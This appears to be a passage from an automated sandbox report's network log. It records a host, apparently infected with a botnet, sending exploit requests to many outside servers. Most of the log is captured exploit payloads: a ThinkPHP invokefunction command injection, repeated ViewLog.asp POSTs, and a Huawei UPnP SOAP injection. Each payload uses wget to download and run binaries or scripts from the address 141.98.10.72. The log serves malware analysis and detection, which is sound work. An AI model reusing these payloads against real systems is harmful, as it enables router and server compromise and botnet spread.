                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        684192.168.2.144662895.101.96.8980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:29.414385080 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:29.616822004 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:34:29 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:29 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 39 33 34 31 30 36 30 26 23 34 36 3b 31 37 30 37 38 39 39 36 36 39 26 23 34 36 3b 32 65 32 61 31 35 64 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;b9341060&#46;1707899669&#46;2e2a15d0</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        685192.168.2.144487694.247.142.2108080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:30.597045898 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        686192.168.2.145475695.164.22.88080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:30.719264030 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        687192.168.2.143887231.200.42.18080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:30.725682020 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        688192.168.2.146099094.122.20.1328080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:30.727284908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        689192.168.2.145368294.123.26.888080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:30.727452040 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        690192.168.2.144858862.29.57.438080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:30.727535009 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        691192.168.2.144946885.113.221.2278080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:30.738210917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:30.999577999 CET505INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:31 GMT
                                                        Server: Apache/2.4.54 (Win64)
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        692192.168.2.1455230197.153.57.10337215
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:31.553776026 CET826OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 37 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        693192.168.2.144261695.211.253.3980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:31.827522039 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:32.031558990 CET479INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 09:02:38 GMT
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        694192.168.2.144400495.111.90.9380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:31.858901024 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:33.294444084 CET21INHTTP/1.1
                                                        Data Raw:
                                                        Data Ascii:
                                                        Feb 14, 2024 09:34:33.294925928 CET339INData Raw: 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 52 6f 75 74 65 72 20 57 65 62 73 65 72 76 65 72 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 57 57 57 2d 41 75 74 68 65 6e 74 69 63 61 74 65 3a 20 42 61 73 69 63 20 72 65 61 6c 6d
                                                        Data Ascii: 200 OKServer: Router WebserverConnection: closeWWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N/WR741ND"Content-Type: text/html<body><script language="javaScript">window.parent.document.cookie="Authorization=;pa


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        695192.168.2.144084295.209.145.2980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:31.954427958 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:32.242223978 CET117INHTTP/1.1 500 Server Error
                                                        Content-Length: 53
                                                        Date: Wed, 14 Feb 2024 08:34:31 GMT
                                                        Connection: close
                                                        Feb 14, 2024 09:34:32.464101076 CET65INData Raw: 45 72 72 6f 72 20 35 30 30 3a 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 43 6c 69 65 6e 74 20 73 65 6e 74 20 6d 61 6c 66 6f 72 6d 65 64 20 72 65 71 75 65 73 74
                                                        Data Ascii: Error 500: Server ErrorClient sent malformed request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        696192.168.2.144409831.136.158.1458080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:32.227669001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:32.933465958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:34.341425896 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:37.157339096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:42.789139032 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:54.052681923 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:18.115576029 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:03.169919014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        697192.168.2.143827094.122.7.378080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:32.252399921 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        698192.168.2.1459856112.29.212.7680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:32.381105900 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
